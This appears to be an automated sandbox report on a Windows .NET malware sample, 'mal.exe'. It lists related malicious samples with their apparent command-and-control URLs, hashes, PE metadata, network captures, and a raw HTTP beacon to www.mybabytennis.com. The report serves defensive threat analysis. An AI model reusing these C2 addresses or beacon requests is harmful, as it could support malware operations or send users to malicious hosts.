                                        • www.mybudget.zone/fmjo/?n48xDrgx=GpIABCQxiObyNblEswvGYvv/sDGQz43HPG7Pv915aVAhMK8loGrecjPaoRAxnJu2VxWp&zJE47=3fLD_NrXMhkl
                                        SWIFT jpg.exeGet hashmaliciousBrowse
                                        • www.lacovidexpress.com/nvj9/?w2=XDRMxc7UIkhWVbW0mmSUyFdnrACDr9+mGsQLTBlwWeXbqmaIwckJXDH9z4EJWnqZ/ad9&BX=7nEt_PI
                                        IRMEFUV8EF.exeGet hashmaliciousBrowse
                                        • www.caminozine.com/et9g/?Rt=5jRtk6QPUNeLf&Z6AdF8=8+BMXVNMMsVrYlzgNQH1TDlCKgoMzV1Fz/FzyLZoUWrMnjl9CKWvex2nc0FVl7SHAfsu
                                        0434 pdf.exeGet hashmaliciousBrowse
                                        • www.bitinnovo.com/gmn/?RvE=JlMxetF0hVF&E8t=xnIRAt/7CYbRUv5b4d7bwBgrW1e4xwfn4tYmIUYBbqi2fkgzrbUtBVRH4ZzrcUfd4Rx2
                                        PO_RFQ007899_PDF.exeGet hashmaliciousBrowse
                                        • www.northatlanticspacearmy.com/zgg6/?i4=Ppcd&N2=nFSvlJEP8Jh213m4NFtxF31kiWpk7m93KklWlj2WLsuCxYct2f6aaHVpJCu4KAYKwmd6
                                        Quotation.exeGet hashmaliciousBrowse
                                        • www.pinewayorganics.com/uidr/?a48=tXExBtAPgPXL&FPWh=D6O5F+Y0fPrtOcUmz12XulGlM3izb9iCvGqr3cKi7KXPDgYxiikAkCk5lq2cxGLYtmRIpdKF7A==
                                        Quotation.exeGet hashmaliciousBrowse
                                        • www.pinewayorganics.com/uidr/?b6=D6O5F+Y0fPrtOcUmz12XulGlM3izb9iCvGqr3cKi7KXPDgYxiikAkCk5lq6ciWHb02Re&DbG=_DKdFj
                                        SKMBT_C280190724010211.exeGet hashmaliciousBrowse
                                        • www.washfoldndelivery.com/css/?X2MhMfE0=4rFc9E/gfr4f5wcqGF2L13wp1H+hdvw3tQh+7wR+s/6Cxbp4UJTH/oYeEBcG3YuqTMyZ&8p=EZTP7L
                                        SWIFT USD 354,883.00.exeGet hashmaliciousBrowse
                                        • www.shuttergame.com/6bu2/?YL0=c+4vkwAPBI+DImtGL27UfnShvOvamLH70aNBjGiX5UbV4Kc9SaGe1WI6mHDGYrUBzGrk&DjU4Hl=gbG8jNk0zBv
                                        SMA121920.exeGet hashmaliciousBrowse
                                        • www.hippopotames-consultation.com/t4vo/?_6j0yv=ZJB82RWHd85&QFNH9f=nRLCrD81qQbjl4vogEmPvpqKSbduAbV7doaYR0QTorLoDCHsZ7ajQx5APP3xBQCKyC9c
                                        SOA121520.exeGet hashmaliciousBrowse
                                        • www.hippopotames-consultation.com/t4vo/?9rspyh=ffh4_hPhQ&xRWxBfL=nRLCrD81qQbjl4vogEmPvpqKSbduAbV7doaYR0QTorLoDCHsZ7ajQx5APMXLRBiyolcb
                                        jrzlwOa0UC.exeGet hashmaliciousBrowse
                                        • www.hippopotames-consultation.com/t4vo/?Dxlpd=nRLCrD81qQbjl4vogEmPvpqKSbduAbV7doaYR0QTorLoDCHsZ7ajQx5APP7xSAOJrS9K82FydA==&lhuh=TxlhfFN
                                        SOA109216.exeGet hashmaliciousBrowse
                                        • www.consultation-hippopotame.com/xnc/?MJBD=FdFp3fCHnzolbffP&qr8=FYfhhZSHsfOnsKkWHClrJR2TlA/j+Ccrgo2TgInX2Dj4taYVRoGOVIInf5Ia+DzU//j9
                                        PI210941.exeGet hashmaliciousBrowse
                                        • www.hippopotames-consultation.com/t4vo/?o2J=nRLCrD81qQbjl4vogEmPvpqKSbduAbV7doaYR0QTorLoDCHsZ7ajQx5APMXLRBiyolcb&4h0=vZR8DbS8Z4yXah
                                        PI109372.exeGet hashmaliciousBrowse
                                        • www.consultation-hippopotame.com/xnc/?8pdXBn8P=FYfhhZSHsfOnsKkWHClrJR2TlA/j+Ccrgo2TgInX2Dj4taYVRoGOVIInf5Ia+DzU//j9&EZUpc0=LDKXxHJhtzTle
                                        PI41006.exeGet hashmaliciousBrowse
                                        • www.consultation-hippopotame.com/xnc/?bl=FYfhhZSHsfOnsKkWHClrJR2TlA/j+Ccrgo2TgInX2Dj4taYVRoGOVIInf5IwhzDU79r9&MJBHa=GdqXjbDP-RddJJ
                                        SKM109482.exeGet hashmaliciousBrowse
                                        • www.consultation-hippopotame.com/xnc/?ohoDP=FYfhhZSHsfOnsKkWHClrJR2TlA/j+Ccrgo2TgInX2Dj4taYVRoGOVIInf6oguSTslYC6&1bj=3fb4M84hjHXXBp
                                        ASQ2109942.exeGet hashmaliciousBrowse
                                        • www.consultation-hippopotame.com/xnc/?Cj=FYfhhZSHsfOnsKkWHClrJR2TlA/j+Ccrgo2TgInX2Dj4taYVRoGOVIInf5Ia+DzU//j9&D8P=Br-0dH
                                        WQA101320.exeGet hashmaliciousBrowse
                                        • www.hippopotames-consultation.com/t4vo/?6lbLpdZ0=nRLCrD81qQbjl4vogEmPvpqKSbduAbV7doaYR0QTorLoDCHsZ7ajQx5APP7INxuKlEhN82F1Ow==&3f=ZlO83hE8VbM
                                        0RNzedtLDba4L25.exeGet hashmaliciousBrowse
                                        • www.diamondridgestablesllc.net/aq3x/

                                        Domains

                                        No context

                                        ASN

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        AMAZON-02USvjsBNwolo9.jsGet hashmaliciousBrowse
                                        • 76.223.26.96
                                        r3xwkKS58W.exeGet hashmaliciousBrowse
                                        • 52.217.135.113
                                        A7X93JRxhpGet hashmaliciousBrowse
                                        • 54.151.74.14
                                        1Ds9g7CEspGet hashmaliciousBrowse
                                        • 13.208.189.104
                                        XuQRPW44hiGet hashmaliciousBrowse
                                        • 54.228.23.118
                                        Taf5zLti30Get hashmaliciousBrowse
                                        • 44.231.84.110
                                        5qpsqg7U0GGet hashmaliciousBrowse
                                        • 34.219.219.82
                                        LyxN1ckWTWGet hashmaliciousBrowse
                                        • 18.139.244.68
                                        ZlvFNj.dllGet hashmaliciousBrowse
                                        • 3.16.22.120
                                        U4r9W64doyGet hashmaliciousBrowse
                                        • 13.245.89.196
                                        C4PozjQdGEGet hashmaliciousBrowse
                                        • 18.135.214.121
                                        kb5IbEJU8cGet hashmaliciousBrowse
                                        • 18.227.43.189
                                        MD5OxTSc6iGet hashmaliciousBrowse
                                        • 18.149.163.217
                                        P58w6OezJY.exeGet hashmaliciousBrowse
                                        • 52.217.198.209
                                        c51w5YSYdOGet hashmaliciousBrowse
                                        • 108.146.155.164
                                        meu.agendamento.msiGet hashmaliciousBrowse
                                        • 52.95.165.102
                                        rxfttQnoO5Get hashmaliciousBrowse
                                        • 18.237.164.103
                                        iUmNR6tkEdGet hashmaliciousBrowse
                                        • 13.208.205.131
                                        LDWhPg4vRMGet hashmaliciousBrowse
                                        • 176.34.44.130
                                        boysLove.dllGet hashmaliciousBrowse
                                        • 52.8.202.218
                                        CONFLUENCE-NETWORK-INCVGvjsBNwolo9.jsGet hashmaliciousBrowse
                                        • 204.11.56.48
                                        Inv_7623980.exeGet hashmaliciousBrowse
                                        • 204.11.56.48
                                        Y-20211907-00927735_pdf.exeGet hashmaliciousBrowse
                                        • 204.11.56.48
                                        OpqhGKdDwO.exeGet hashmaliciousBrowse
                                        • 209.99.40.222
                                        jnl3kWNWWS.exeGet hashmaliciousBrowse
                                        • 208.91.197.27
                                        request for quote.exeGet hashmaliciousBrowse
                                        • 208.91.197.91
                                        2GuNlCn0X6.exeGet hashmaliciousBrowse
                                        • 208.91.197.27
                                        G1638.exeGet hashmaliciousBrowse
                                        • 204.11.56.48
                                        VLC_32.exeGet hashmaliciousBrowse
                                        • 208.91.196.145
                                        seBe6bgLTw.exeGet hashmaliciousBrowse
                                        • 209.99.40.222
                                        doc.exeGet hashmaliciousBrowse
                                        • 208.91.197.91
                                        DOC00368.exeGet hashmaliciousBrowse
                                        • 208.91.197.91
                                        PO=List Orders 2921TYP001 - Xls.exeGet hashmaliciousBrowse
                                        • 208.91.197.91
                                        SEOCHANG INDUSTRY Co., Ltd..exeGet hashmaliciousBrowse
                                        • 209.99.40.222
                                        Order=bcm_28062021.exeGet hashmaliciousBrowse
                                        • 208.91.197.27
                                        SEOCHANG INDUSTRY Co., Ltd..exeGet hashmaliciousBrowse
                                        • 209.99.40.222
                                        Invoice confirmation & NEW PO for 2 sets of items.exeGet hashmaliciousBrowse
                                        • 208.91.197.39
                                        h3Ls1L8ZOLGet hashmaliciousBrowse
                                        • 208.91.197.238
                                        0rder-bcm_23062021.exeGet hashmaliciousBrowse
                                        • 208.91.197.27
                                        New Order.exeGet hashmaliciousBrowse
                                        • 208.91.197.91

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\mal.exe.log
                                        Process:C:\Users\user\Desktop\mal.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1216
                                        Entropy (8bit):5.355304211458859
                                        Encrypted:false
                                        SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
                                        MD5:69206D3AF7D6EFD08F4B4726998856D3
                                        SHA1:E778D4BF781F7712163CF5E2F5E7C15953E484CF
                                        SHA-256:A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
                                        SHA-512:CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
                                        Malicious:true
                                        Reputation:high, very likely benign file
                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                        Static File Info

                                        General

                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Entropy (8bit):7.8474389500273185
                                        TrID:
                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                        • Win32 Executable (generic) a (10002005/4) 49.75%
                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                        • Windows Screen Saver (13104/52) 0.07%
                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                        File name:mal.exe
                                        File size:605696
                                        MD5:b9bca038d7532ec8a1a9ba0e867061bc
                                        SHA1:6596ac1216bf03d88482415755c499ed6388cab4
                                        SHA256:24d91f6c3dcad36d65e45821d520aaabc2f4a87bb1ab512d6807377010d5680e
                                        SHA512:861bfb748cd3060698d23e04e0b58d2e2eb12dedfbfdeeece6a5643bdeab9472bbe3f73d144e95fd78e8ee862ae3fde9385b11b2f35b0ea0c974326d70846e6d
                                        SSDEEP:12288:NRzBs9vQVJ16RzfqfJ3druK3MfxoH6prHTdtqMVkhV8Rb:NQ9vQr147qfJ4nxxHTni
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....B.`..............P..4...........R... ...`....@.. ....................................@................................

                                        File Icon

                                        Icon Hash:00828e8e8686b000

                                        Static PE Info

                                        General

                                        Entrypoint:0x4952ee
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                        Time Stamp:0x60F242BD [Sat Jul 17 02:38:53 2021 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:v4.0.30319
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                        Entrypoint Preview

                                        Instruction
                                        jmp dword ptr [00402000h]
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al

                                        Data Directories

                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x9529c0x4f.text
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x960000x5f8.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x980000xc.reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                        Sections

                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x20000x932f40x93400False0.890101071732data7.85599061274IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                        .rsrc0x960000x5f80x600False0.438151041667data4.22887304972IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc0x980000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                        Resources

                                        NameRVASizeTypeLanguageCountry
                                        RT_VERSION0x960a00x36cdata
                                        RT_MANIFEST0x9640c0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                        Imports

                                        DLLImport
                                        mscoree.dll_CorExeMain

                                        Version Infos

                                        DescriptionData
                                        Translation0x0000 0x04b0
                                        LegalCopyrightCopyright 2013 - 2021
                                        Assembly Version1.0.0.0
                                        InternalNameObjectEqualityCompar.exe
                                        FileVersion1.0.0.0
                                        CompanyNameAnt Z
                                        LegalTrademarks
                                        Comments
                                        ProductNamedDice Board
                                        ProductVersion1.0.0.0
                                        FileDescriptiondDice Board
                                        OriginalFilenameObjectEqualityCompar.exe

                                        Network Behavior

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Jul 22, 2021 08:46:34.757560968 CEST4974180192.168.2.3209.99.64.55
                                        Jul 22, 2021 08:46:34.920352936 CEST8049741209.99.64.55192.168.2.3
                                        Jul 22, 2021 08:46:34.920469046 CEST4974180192.168.2.3209.99.64.55
                                        Jul 22, 2021 08:46:34.920579910 CEST4974180192.168.2.3209.99.64.55
                                        Jul 22, 2021 08:46:35.083355904 CEST8049741209.99.64.55192.168.2.3
                                        Jul 22, 2021 08:46:35.185102940 CEST8049741209.99.64.55192.168.2.3
                                        Jul 22, 2021 08:46:35.185132980 CEST8049741209.99.64.55192.168.2.3
                                        Jul 22, 2021 08:46:35.185158968 CEST8049741209.99.64.55192.168.2.3
                                        Jul 22, 2021 08:46:35.185180902 CEST8049741209.99.64.55192.168.2.3
                                        Jul 22, 2021 08:46:35.185201883 CEST8049741209.99.64.55192.168.2.3
                                        Jul 22, 2021 08:46:35.185226917 CEST8049741209.99.64.55192.168.2.3
                                        Jul 22, 2021 08:46:35.185244083 CEST8049741209.99.64.55192.168.2.3
                                        Jul 22, 2021 08:46:35.185260057 CEST8049741209.99.64.55192.168.2.3
                                        Jul 22, 2021 08:46:35.185276031 CEST8049741209.99.64.55192.168.2.3
                                        Jul 22, 2021 08:46:35.185291052 CEST8049741209.99.64.55192.168.2.3
                                        Jul 22, 2021 08:46:35.185348034 CEST4974180192.168.2.3209.99.64.55
                                        Jul 22, 2021 08:46:35.185430050 CEST4974180192.168.2.3209.99.64.55
                                        Jul 22, 2021 08:46:35.283205032 CEST8049741209.99.64.55192.168.2.3
                                        Jul 22, 2021 08:46:35.337038040 CEST4974180192.168.2.3209.99.64.55
                                        Jul 22, 2021 08:46:35.350320101 CEST8049741209.99.64.55192.168.2.3
                                        Jul 22, 2021 08:46:35.350378990 CEST8049741209.99.64.55192.168.2.3
                                        Jul 22, 2021 08:46:35.350410938 CEST8049741209.99.64.55192.168.2.3
                                        Jul 22, 2021 08:46:35.350434065 CEST4974180192.168.2.3209.99.64.55
                                        Jul 22, 2021 08:46:35.350441933 CEST8049741209.99.64.55192.168.2.3
                                        Jul 22, 2021 08:46:35.350474119 CEST8049741209.99.64.55192.168.2.3
                                        Jul 22, 2021 08:46:35.350476027 CEST4974180192.168.2.3209.99.64.55
                                        Jul 22, 2021 08:46:35.350503922 CEST8049741209.99.64.55192.168.2.3
                                        Jul 22, 2021 08:46:35.350537062 CEST8049741209.99.64.55192.168.2.3
                                        Jul 22, 2021 08:46:35.350538015 CEST4974180192.168.2.3209.99.64.55
                                        Jul 22, 2021 08:46:35.350630045 CEST4974180192.168.2.3209.99.64.55
                                        Jul 22, 2021 08:46:35.350687981 CEST4974180192.168.2.3209.99.64.55
                                        Jul 22, 2021 08:46:35.513433933 CEST8049741209.99.64.55192.168.2.3
                                        Jul 22, 2021 08:46:55.629483938 CEST4974480192.168.2.352.58.78.16
                                        Jul 22, 2021 08:46:55.671760082 CEST804974452.58.78.16192.168.2.3
                                        Jul 22, 2021 08:46:55.671914101 CEST4974480192.168.2.352.58.78.16
                                        Jul 22, 2021 08:46:55.672247887 CEST4974480192.168.2.352.58.78.16
                                        Jul 22, 2021 08:46:55.714323997 CEST804974452.58.78.16192.168.2.3
                                        Jul 22, 2021 08:46:55.714467049 CEST804974452.58.78.16192.168.2.3
                                        Jul 22, 2021 08:46:55.714554071 CEST804974452.58.78.16192.168.2.3
                                        Jul 22, 2021 08:46:55.714948893 CEST4974480192.168.2.352.58.78.16
                                        Jul 22, 2021 08:46:55.715132952 CEST4974480192.168.2.352.58.78.16
                                        Jul 22, 2021 08:46:55.757101059 CEST804974452.58.78.16192.168.2.3

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Jul 22, 2021 08:44:51.458204031 CEST53491998.8.8.8192.168.2.3
                                        Jul 22, 2021 08:44:56.829283953 CEST5062053192.168.2.38.8.8.8
                                        Jul 22, 2021 08:44:56.886512995 CEST53506208.8.8.8192.168.2.3
                                        Jul 22, 2021 08:44:58.067944050 CEST6493853192.168.2.38.8.8.8
                                        Jul 22, 2021 08:44:58.127675056 CEST53649388.8.8.8192.168.2.3
                                        Jul 22, 2021 08:45:01.566647053 CEST6015253192.168.2.38.8.8.8
                                        Jul 22, 2021 08:45:01.618920088 CEST53601528.8.8.8192.168.2.3
                                        Jul 22, 2021 08:45:02.785415888 CEST5754453192.168.2.38.8.8.8
                                        Jul 22, 2021 08:45:02.834528923 CEST53575448.8.8.8192.168.2.3
                                        Jul 22, 2021 08:45:04.127221107 CEST5598453192.168.2.38.8.8.8
                                        Jul 22, 2021 08:45:04.187202930 CEST53559848.8.8.8192.168.2.3
                                        Jul 22, 2021 08:45:05.395222902 CEST6418553192.168.2.38.8.8.8
                                        Jul 22, 2021 08:45:05.447316885 CEST53641858.8.8.8192.168.2.3
                                        Jul 22, 2021 08:45:06.547672033 CEST6511053192.168.2.38.8.8.8
                                        Jul 22, 2021 08:45:06.598192930 CEST53651108.8.8.8192.168.2.3
                                        Jul 22, 2021 08:45:07.696602106 CEST5836153192.168.2.38.8.8.8
                                        Jul 22, 2021 08:45:07.749336958 CEST53583618.8.8.8192.168.2.3
                                        Jul 22, 2021 08:45:09.949743986 CEST6349253192.168.2.38.8.8.8
                                        Jul 22, 2021 08:45:09.999214888 CEST53634928.8.8.8192.168.2.3
                                        Jul 22, 2021 08:45:11.109864950 CEST6083153192.168.2.38.8.8.8
                                        Jul 22, 2021 08:45:11.166743994 CEST53608318.8.8.8192.168.2.3
                                        Jul 22, 2021 08:45:12.624847889 CEST6010053192.168.2.38.8.8.8
                                        Jul 22, 2021 08:45:12.674185038 CEST53601008.8.8.8192.168.2.3
                                        Jul 22, 2021 08:45:14.427427053 CEST6050053192.168.2.38.8.8.8
                                        Jul 22, 2021 08:45:14.487272978 CEST53605008.8.8.8192.168.2.3
                                        Jul 22, 2021 08:45:16.753005981 CEST5319553192.168.2.38.8.8.8
                                        Jul 22, 2021 08:45:16.802360058 CEST53531958.8.8.8192.168.2.3
                                        Jul 22, 2021 08:45:17.686148882 CEST5014153192.168.2.38.8.8.8
                                        Jul 22, 2021 08:45:17.735698938 CEST53501418.8.8.8192.168.2.3
                                        Jul 22, 2021 08:45:18.797241926 CEST5302353192.168.2.38.8.8.8
                                        Jul 22, 2021 08:45:18.849786043 CEST53530238.8.8.8192.168.2.3
                                        Jul 22, 2021 08:45:22.537863016 CEST4956353192.168.2.38.8.8.8
                                        Jul 22, 2021 08:45:22.590339899 CEST53495638.8.8.8192.168.2.3
                                        Jul 22, 2021 08:45:22.643804073 CEST5135253192.168.2.38.8.8.8
                                        Jul 22, 2021 08:45:22.711456060 CEST53513528.8.8.8192.168.2.3
                                        Jul 22, 2021 08:45:24.932343960 CEST5934953192.168.2.38.8.8.8
                                        Jul 22, 2021 08:45:24.984980106 CEST53593498.8.8.8192.168.2.3
                                        Jul 22, 2021 08:45:26.354058981 CEST5708453192.168.2.38.8.8.8
                                        Jul 22, 2021 08:45:26.407027960 CEST53570848.8.8.8192.168.2.3
                                        Jul 22, 2021 08:45:27.647547007 CEST5882353192.168.2.38.8.8.8
                                        Jul 22, 2021 08:45:27.707258940 CEST53588238.8.8.8192.168.2.3
                                        Jul 22, 2021 08:45:29.410845995 CEST5756853192.168.2.38.8.8.8
                                        Jul 22, 2021 08:45:29.491995096 CEST53575688.8.8.8192.168.2.3
                                        Jul 22, 2021 08:45:40.842348099 CEST5054053192.168.2.38.8.8.8
                                        Jul 22, 2021 08:45:40.910532951 CEST53505408.8.8.8192.168.2.3
                                        Jul 22, 2021 08:45:46.791016102 CEST5436653192.168.2.38.8.8.8
                                        Jul 22, 2021 08:45:46.848736048 CEST53543668.8.8.8192.168.2.3
                                        Jul 22, 2021 08:45:59.730150938 CEST5303453192.168.2.38.8.8.8
                                        Jul 22, 2021 08:45:59.789141893 CEST53530348.8.8.8192.168.2.3
                                        Jul 22, 2021 08:46:04.129590034 CEST5776253192.168.2.38.8.8.8
                                        Jul 22, 2021 08:46:04.189656019 CEST53577628.8.8.8192.168.2.3
                                        Jul 22, 2021 08:46:34.563913107 CEST5543553192.168.2.38.8.8.8
                                        Jul 22, 2021 08:46:34.728636026 CEST5071353192.168.2.38.8.8.8
                                        Jul 22, 2021 08:46:34.750056028 CEST53554358.8.8.8192.168.2.3
                                        Jul 22, 2021 08:46:34.787168026 CEST53507138.8.8.8192.168.2.3
                                        Jul 22, 2021 08:46:36.639389992 CEST5613253192.168.2.38.8.8.8
                                        Jul 22, 2021 08:46:36.699801922 CEST53561328.8.8.8192.168.2.3
                                        Jul 22, 2021 08:46:55.566098928 CEST5898753192.168.2.38.8.8.8
                                        Jul 22, 2021 08:46:55.627665997 CEST53589878.8.8.8192.168.2.3

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                        Jul 22, 2021 08:46:34.563913107 CEST192.168.2.38.8.8.80xb083Standard query (0)www.mybabytennis.comA (IP address)IN (0x0001)
                                        Jul 22, 2021 08:46:55.566098928 CEST192.168.2.38.8.8.80xe69Standard query (0)www.sarahcarver.comA (IP address)IN (0x0001)

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                        Jul 22, 2021 08:46:34.750056028 CEST8.8.8.8192.168.2.30xb083No error (0)www.mybabytennis.com209.99.64.55A (IP address)IN (0x0001)
                                        Jul 22, 2021 08:46:55.627665997 CEST8.8.8.8192.168.2.30xe69No error (0)www.sarahcarver.com52.58.78.16A (IP address)IN (0x0001)

                                        HTTP Request Dependency Graph

                                        • www.mybabytennis.com
                                        • www.sarahcarver.com

                                        HTTP Packets

                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        0192.168.2.349741209.99.64.5580C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 22, 2021 08:46:34.920579910 CEST7257OUTGET /sm3l/?y0DdGli=KvXnBCtAoO2yHEt5dL0Fxw3RJm1prCWWr0IwHlUk9+xe6WE7Z8sx0d/816zczOTA6oQi&ixo0sr=dFQtk HTTP/1.1
                                        Host: www.mybabytennis.com
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Jul 22, 2021 08:46:35.185102940 CEST7265INHTTP/1.1 200 OK
                                        Date: Thu, 22 Jul 2021 06:46:35 GMT
                                        Server: Apache
                                        Set-Cookie: vsid=928vr3744819950810715; expires=Tue, 21-Jul-2026 06:46:35 GMT; Max-Age=157680000; path=/; domain=www.mybabytennis.com; HttpOnly
                                        X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_V1iJ5dQh21esvqyq8b7SOOb09E/Ey8thZJ4ysrzpYmPV9tiLY/fxl+NKHpYYoUEsQzwKG2W3tK274B7HIDnlFA==
                                        Keep-Alive: timeout=5, max=121
                                        Connection: Keep-Alive
                                        Transfer-Encoding: chunked
